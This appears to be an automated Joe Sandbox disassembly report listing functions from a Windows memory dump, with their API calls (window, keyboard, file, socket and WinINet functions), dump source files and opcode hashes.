                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3880355969-0
                                                                                                                                                                              • Opcode ID: a283aa5cf01b0232632478e96d108285d55695cf6e876888d78fdd626ed98b5a
                                                                                                                                                                              • Instruction ID: 4422f4b5c38a6cd6fc3a634d09ccb8b61ab6a904293cf9b8b0eadad0217002cd
                                                                                                                                                                              • Opcode Fuzzy Hash: a283aa5cf01b0232632478e96d108285d55695cf6e876888d78fdd626ed98b5a
                                                                                                                                                                              • Instruction Fuzzy Hash: 68517B31A00204EFEF20DF68D880AEE7FB6BB55360F248559F8259B290D771ED81DB90
                                                                                                                                                                              Function 004ED206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004ED258
                                                                                                                                                                              • __itow.LIBCMT ref: 004ED292
                                                                                                                                                                                • Part of subcall function 004ED4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 004ED549
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 004ED2FB
                                                                                                                                                                              • __itow.LIBCMT ref: 004ED350
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$__itow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3379773720-0
                                                                                                                                                                              • Opcode ID: 8dd9792a5d72c9900165eed55de0e0a267c6e7e72f8fd14209a331616d966437
                                                                                                                                                                              • Instruction ID: f439645b11a4d5579c2fe456fd83c06c3b059672f97f1e3e18a1e2803ae372f6
                                                                                                                                                                              • Opcode Fuzzy Hash: 8dd9792a5d72c9900165eed55de0e0a267c6e7e72f8fd14209a331616d966437
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C41E671A00249ABDF11DF56C842BEF7BB9AF58705F00005FFA05A3291DB789A45CB6A
                                                                                                                                                                              Function 004FEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004FEF32
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 004FEF58
                                                                                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004FEF7D
                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004FEFA9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3321077145-0
                                                                                                                                                                              • Opcode ID: a471fc4f47ba6268cc1aa260bae790c5e8666a0ba40c6ef3a6bdbdea2a0c2923
                                                                                                                                                                              • Instruction ID: d9e8d9f90eeb79a8fa8a86b1af4bcd2cd1b529911bad5e6058e46823663e1982
                                                                                                                                                                              • Opcode Fuzzy Hash: a471fc4f47ba6268cc1aa260bae790c5e8666a0ba40c6ef3a6bdbdea2a0c2923
                                                                                                                                                                              • Instruction Fuzzy Hash: 64416C39600611DFCB10EF16C544A5ABBF5EF88324B18809EE945AF362DB78FD01DBA5
                                                                                                                                                                              Function 0051B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0051B3E1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InvalidateRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 634782764-0
                                                                                                                                                                              • Opcode ID: b2e0f4ddab85e807db2bdc24cfadd4ee22b68e5129fa7c248adfe5368fb35810
                                                                                                                                                                              • Instruction ID: af682b03fa785d0868b225631e6514240b63fa820b6135b70ed39b564d8cc7b6
                                                                                                                                                                              • Opcode Fuzzy Hash: b2e0f4ddab85e807db2bdc24cfadd4ee22b68e5129fa7c248adfe5368fb35810
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E319034600204EFFF249E58DC85FE83F66BB05350F54C916FA61D62A2C7B0E9D4AB61
                                                                                                                                                                              Function 0051D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0051D617
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0051D68D
                                                                                                                                                                              • PtInRect.USER32(?,?,0051EB2C), ref: 0051D69D
                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 0051D70E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1352109105-0
                                                                                                                                                                              • Opcode ID: 068cf751805594ce1ed92d983e51dfa1cbba26cc1f0e0f639a3fcdc7093f14e9
                                                                                                                                                                              • Instruction ID: ad77445d79938f4c63deb8947b5f10376097fb3f01477646964d718debed4c75
                                                                                                                                                                              • Opcode Fuzzy Hash: 068cf751805594ce1ed92d983e51dfa1cbba26cc1f0e0f639a3fcdc7093f14e9
                                                                                                                                                                              • Instruction Fuzzy Hash: 85418D35600619DFEB11CF98E884BE9BFF5FB55300F1881AAE4599B291D730E885EB60
                                                                                                                                                                              Function 004F4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 004F44EE
                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 004F450A
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 004F456A
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 004F45C8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                              • Opcode ID: caff641162b6e27fbbd957de4991be57fbdef9dc00790c18ea8d400e33f1324a
                                                                                                                                                                              • Instruction ID: 6f01a0dfa84a084423ed1e51ca9aa0b515a5510356f17a2b6788c06e40031a6f
                                                                                                                                                                              • Opcode Fuzzy Hash: caff641162b6e27fbbd957de4991be57fbdef9dc00790c18ea8d400e33f1324a
                                                                                                                                                                              • Instruction Fuzzy Hash: 21311271A0025C7BEF20AB6498087BF7BB59B89314F04121BF381923C1CB7C8A49976A
                                                                                                                                                                              Function 004E4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004E4DE8
                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 004E4E16
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004E4E44
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004E4E7A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                              • Opcode ID: d9827d7888c7ad08dead5306605e9f70b43a2422513966afef9670cdf046c3d9
                                                                                                                                                                              • Instruction ID: 7fbdcfde6bccf4fc75a3ddda58813ce925c4e715ef4a9248ccfcdf9bcc4b5906
                                                                                                                                                                              • Opcode Fuzzy Hash: d9827d7888c7ad08dead5306605e9f70b43a2422513966afef9670cdf046c3d9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0631C130600286AFDF219F7ACC45BAB7BB5BF81311F15456AE821872A0E738EC51D794
                                                                                                                                                                              Function 00517AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00517AB6
                                                                                                                                                                                • Part of subcall function 004F69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F69E3
                                                                                                                                                                                • Part of subcall function 004F69C9: GetCurrentThreadId.KERNEL32 ref: 004F69EA
                                                                                                                                                                                • Part of subcall function 004F69C9: AttachThreadInput.USER32(00000000,?,004F8127), ref: 004F69F1
                                                                                                                                                                              • GetCaretPos.USER32(?), ref: 00517AC7
                                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00517B00
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00517B06
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2759813231-0
                                                                                                                                                                              • Opcode ID: db4f27decca55fc86b6e9d01d035a8d3f5ce7eb16434d46d345cbe7344050fa6
                                                                                                                                                                              • Instruction ID: 348339712a9c0a7f1e6253db418b1a347b5ccfdefa815ad76f0ff0ba9b033c36
                                                                                                                                                                              • Opcode Fuzzy Hash: db4f27decca55fc86b6e9d01d035a8d3f5ce7eb16434d46d345cbe7344050fa6
                                                                                                                                                                              • Instruction Fuzzy Hash: A1310F75D00108AFDB00EFB6D985DEFBBF9EF58314B10806AE815E7211DA759E058BA4
                                                                                                                                                                              Function 0051EFA8 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0051EFE2
                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0052F3C3,?,?,?,?,?), ref: 0051EFF7
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0051F041
                                                                                                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0052F3C3,?,?,?), ref: 0051F077
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2864067406-0
                                                                                                                                                                              • Opcode ID: 6b7a965d225fc38835ba19c0596be1114600b5e2bd2f6586ac01924b0c84c374
                                                                                                                                                                              • Instruction ID: ab341cb6fd1872f98525b9d2f6ff3195458ddbdf62c33d147c96072760b9558a
                                                                                                                                                                              • Opcode Fuzzy Hash: 6b7a965d225fc38835ba19c0596be1114600b5e2bd2f6586ac01924b0c84c374
                                                                                                                                                                              • Instruction Fuzzy Hash: 02212335500018EFDB258F59D898EEA7FB5FB09724F044069F90A872A2C3309D91EBA0
                                                                                                                                                                              Function 0050497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005049B7
                                                                                                                                                                                • Part of subcall function 00504A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00504A60
                                                                                                                                                                                • Part of subcall function 00504A41: InternetCloseHandle.WININET(00000000), ref: 00504AFD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1463438336-0
                                                                                                                                                                              • Opcode ID: 41d120cdf72c1bb7103230b9dc3e3499858004671b3ed49ee71bd54d692555cc
                                                                                                                                                                              • Instruction ID: 292d84a00f76bcf0ea2cac8f4ec5bac3890348645a97877a5744fbdda2cdec4f
                                                                                                                                                                              • Opcode Fuzzy Hash: 41d120cdf72c1bb7103230b9dc3e3499858004671b3ed49ee71bd54d692555cc
                                                                                                                                                                              • Instruction Fuzzy Hash: 0B21C571240605BBDB129F609C05F7FBFBAFB98711F10441AFA0596690EB719814AF64
                                                                                                                                                                              Function 00518834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 005188A3
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005188BD
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005188CB
                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005188D9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2169480361-0
                                                                                                                                                                              • Opcode ID: 4cf8d593cbf8565eae9143de582ab5fa9d7a32e69998b2de97f5bdd14db360c5
                                                                                                                                                                              • Instruction ID: f9f8f7c89c5270e2594368b0869e04aa3baaee22a6e90a905c17fa54ee6857e2
                                                                                                                                                                              • Opcode Fuzzy Hash: 4cf8d593cbf8565eae9143de582ab5fa9d7a32e69998b2de97f5bdd14db360c5
                                                                                                                                                                              • Instruction Fuzzy Hash: AC11AC35204114BFEB14AB29DC55FFA7BA9BF85324F04851AF816C72A1CBA4AC40CBA4
                                                                                                                                                                              Function 0050900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0050906D
                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 0050907F
                                                                                                                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 0050908C
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 005090A3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastacceptselect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 385091864-0
                                                                                                                                                                              • Opcode ID: b41f3e4c4be10dfdec7cd80911985a1f36ba49a71614d2d333a8230fa34eefe2
                                                                                                                                                                              • Instruction ID: 56af49334aaf43d597ee49c4ce51e39b8c35acd2df557cc188d1879660e3c6b4
                                                                                                                                                                              • Opcode Fuzzy Hash: b41f3e4c4be10dfdec7cd80911985a1f36ba49a71614d2d333a8230fa34eefe2
                                                                                                                                                                              • Instruction Fuzzy Hash: C321AE76A00124AFCB10DF69D894A9EBBFCEF49710F00816AF809D7391DA749A45CBA0
                                                                                                                                                                              Function 004F18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?), ref: 004F2CB9
                                                                                                                                                                                • Part of subcall function 004F2CAA: lstrcpyW.KERNEL32(00000000,?,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F2CDF
                                                                                                                                                                                • Part of subcall function 004F2CAA: lstrcmpiW.KERNEL32(00000000,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?), ref: 004F2D10
                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F1916
                                                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F193C
                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F1970
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                              • String ID: cdecl
                                                                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                                                                              • Opcode ID: 04fa436a375609660702438bbd187754fa7924c45fc54163c0230eb645fa865b
                                                                                                                                                                              • Instruction ID: 67ba4d0e54f631777b86f6b9418a8d560087fe1df5b110017cd862ded6156bf9
                                                                                                                                                                              • Opcode Fuzzy Hash: 04fa436a375609660702438bbd187754fa7924c45fc54163c0230eb645fa865b
                                                                                                                                                                              • Instruction Fuzzy Hash: 6311AC76200309EBDB15AF34D855E7A77B8FF44350B80802BE906CB2A0EBB69855D7E5
                                                                                                                                                                              Function 004E3D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 004E3D65
                                                                                                                                                                                • Part of subcall function 004D45EC: __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                                                                                                                                                • Part of subcall function 004D45EC: __NMSG_WRITE.LIBCMT ref: 004D460A
                                                                                                                                                                                • Part of subcall function 004D45EC: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,?,?,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D462F
